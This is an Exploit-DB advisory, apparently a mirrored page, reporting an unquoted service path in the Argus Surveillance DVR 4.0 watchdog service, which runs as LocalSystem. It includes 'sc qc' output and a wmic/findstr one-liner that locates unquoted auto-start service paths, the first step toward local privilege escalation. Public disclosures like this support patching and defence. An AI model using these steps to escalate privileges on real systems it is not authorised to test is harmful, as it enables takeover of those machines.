Argus Surveillance DVR 4.0 – Unquoted Service Path

  • 作者: Salman Asad
    日期: 2021-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50261/
  • # Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
    # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
    # Date: 03.09.2021
    # Version: Argus Surveillance DVR 4.0
    # Tested on: Windows 10
    
    # Note: "Start as service on Windows Startup" must be enabled in Program Options
    
    # Proof of Concept:
    
    C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
    TYPE : 110WIN32_OWN_PROCESS (interactive)
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : Argus Surveillance DVR Watchdog
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    
    C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
    Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto